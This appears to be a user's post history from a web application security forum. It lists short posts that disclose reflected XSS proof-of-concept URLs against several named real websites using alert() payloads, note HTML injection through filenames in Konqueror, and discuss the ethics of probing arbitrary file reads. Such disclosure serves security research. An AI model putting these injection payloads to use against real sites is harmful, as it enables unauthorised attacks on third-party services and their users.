sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
The ha.ckers.org and sla.ckers.org web application security lab house rules and a place for you to introduce yourself if you like. 

Current Page: 1 of 1
Results 1 - 9 of 9
7 years ago
tr1pp33
I don't know what real use this is but I discovered that there is limited HTML injection under Konqueror (file manager/internet browser in KDE for Linux). If you name a file as HTML code, i.e. filename is like <html><body> ... </body></html>, then you can alter the contents of the status bar which shows the file information. Currently, I've only managed to get it to sho
Forum: OMG Ponies
7 years ago
tr1pp33
Weather Underground, I think there's loads here http://www.wunderground.com/wximage/viewsingleimage.html?mode=singleimage&handle=<script>alert("XSS")</script>&number=0
Forum: Full Disclosure
7 years ago
tr1pp33
I was messing around on alexa.com and found this 'bug' http://www.alexa.com/data/details/traffic_details?url=%00.com the above caused an error saying "Service is unavailable", but if I put in a non-existent website as the url parameter http://www.alexa.com/data/details/traffic_details?url=thissisnotarealwebsite.com I get a no data message. I'm not exactly sure what is happeni
Forum: XSS Info
7 years ago
tr1pp33
yet another image host http://www.picoodle.com/search.php?q="<script>alert(123)</script> tr1pp33 - I need a cool sig, help? ;)
Forum: Full Disclosure
7 years ago
tr1pp33
Another one on torrent site. 3 times on one page, what's the most reflected attacks on one page that someone's ever seen? http://torrentfreak.com/?s=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E tr1pp33 - Need a Sig
Forum: Full Disclosure
7 years ago
tr1pp33
My first disclosure :) http://photobucket.com/images/%22%3E%3CBODY%20ONLOAD=alert(123)%3E/
Forum: Full Disclosure
7 years ago
tr1pp33
Well Jib, I suppose that ethically, if you don't have an agreement with the site's owner, you are already crossing the ethical boundary. The more interesting issue like RSnake suggested was how to prove innocence or intent on the web. You see many reports of people's PCs being infected and turned into zombies for spamming purposes/DDoS. It could also be used as a launching platform for hacking.
Forum: OMG Ponies
7 years ago
tr1pp33
I've been thinking that some sites when tested, vulnerabilities come to light. However, how deep should we test? Example: Site has weakness which allows reading of arbitrary files on the remote server is it ethical to see how far we can break the system i.e. read remote file which contains SQL passwords .htpasswd files or should we just realise that Yes, we can read any file which that remote
Forum: OMG Ponies
7 years ago
tr1pp33
This is a very good forum, very informative and up to date. Hopefully, I'll be able to contribute something useful in future. Still doing a lot of research into the field at the moment i.e. still a lurking newbie :)
Forum: Intro